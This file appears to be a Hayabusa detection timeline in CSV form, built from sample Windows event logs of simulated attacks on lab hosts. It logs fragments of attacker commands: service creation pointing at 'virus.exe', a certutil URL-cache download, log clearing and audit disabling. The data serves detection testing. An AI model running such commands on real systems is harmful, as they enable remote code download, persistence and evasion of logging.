+09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 05:17:07.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc create hacker-testl3 binPath=""3virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x64c | User: admmig | LID: 0x123550",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service created (command).evtx 2021-10-26 05:23:34.575 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"New-Service -Name ""hackervirus"" -BinaryPathName '""virus.exe""'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx 2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx 2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Service): ""New-Service"" ParameterBinding(New-Service): name=""Name""; value=""hackervirus"" ParameterBinding(New-Service): name=""BinaryPathName""; value=""""virus.exe""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx 2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". See `""get-help about_Command_Precedence`"" for more details.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx 2021-10-26 05:23:34.715 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""hackervirus""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx 2021-10-26 05:23:34.736 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID800-4103-4104-Service creation (PowerShell).evtx 2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" 2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" 2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" 2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" 2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" 2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" 2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" 2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" 2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" 2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" 2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" 2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" 2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" 2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx 2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx 2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx 2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" 2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" 2021-10-27 19:35:56.899 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf08 | User: FS03$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" 2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3388 | PGUID: 7CF65FC7-A881-617A-0605-000000001300 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx 2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx 2021-10-31 23:28:15.330 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx 2021-10-31 23:28:15.331 +09:00,jump01.offsec.lan,4104,low,Disc,Suspicious Get Local Groups Information,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx 2021-10-31 23:28:15.331 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-LocalGroupMember -Name Administrators,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx 2021-10-31 23:28:15.342 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-LocalGroupMember): ""Get-LocalGroupMember"" ParameterBinding(Get-LocalGroupMember): name=""Name""; value=""Administrators""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx 2021-10-31 23:28:15.342 +09:00,jump01.offsec.lan,4103,low,Disc,Suspicious Get Local Groups Information,,../hayabusa-rules/sigma/powershell/powershell_module/posh_pm_suspicious_local_group_reco.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx 2021-10-31 23:28:15.351 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""JUMP01\Administrator"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\Domain Admins"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\Nessus Local Access"" ParameterBinding(Out-Default): name=""InputObject""; value=""OFFSEC\SG_LocalAdmin_Lab""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx 2021-10-31 23:28:15.353 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx 2021-10-31 23:28:15.354 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Local group discovery via PowerShell.evtx.evtx 2021-10-31 23:37:10.246 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx 2021-10-31 23:37:10.247 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-ADGroupMember -Identity 'Administrators',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx 2021-10-31 23:37:10.396 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-ADGroupMember): ""Get-ADGroupMember"" ParameterBinding(Get-ADGroupMember): name=""Identity""; value=""Administrators""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx 2021-10-31 23:37:10.398 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Nessus Local Access,OU=Security-groups,OU=OFFSEC-COMPANY,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Domain Admins,CN=Users,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Enterprise Admins,CN=Users,DC=offsec,DC=lan"" ParameterBinding(Out-Default): name=""InputObject""; value=""CN=Administrator,CN=Users,DC=offsec,DC=lan""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx 2021-10-31 23:37:10.401 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx 2021-10-31 23:37:10.402 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID800-4103-4104-Domain group discovery via PowerShell.evtx 2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx 2021-11-02 23:15:24.567 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: certutil -urlcache -split -f https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/blob/master/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec%20remote%20trask%20creation%20(GLOBAL).evtx virus.exe | Path: C:\Windows\System32\certutil.exe | PID: 0xedc | User: admmig | LID: 0x5ba37",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx 2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:14.789 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBUaGlzIFBvd2Vyc2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 